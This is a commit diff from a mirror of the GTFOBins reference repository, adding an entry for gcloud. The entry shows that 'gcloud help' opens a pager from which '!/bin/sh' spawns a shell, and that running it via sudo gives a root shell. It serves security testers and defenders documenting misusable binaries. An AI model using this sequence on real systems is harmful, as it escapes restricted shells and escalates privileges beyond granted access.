mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 12:13:13 +02:00
13
_gtfobins/gcloud.md
Normal file
13
_gtfobins/gcloud.md
Normal file
@@ -0,0 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
gcloud help
|
||||
!/bin/sh
|
||||
sudo:
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
sudo gcloud help
|
||||
!/bin/sh
|
||||
---
|
Reference in New Issue
Block a user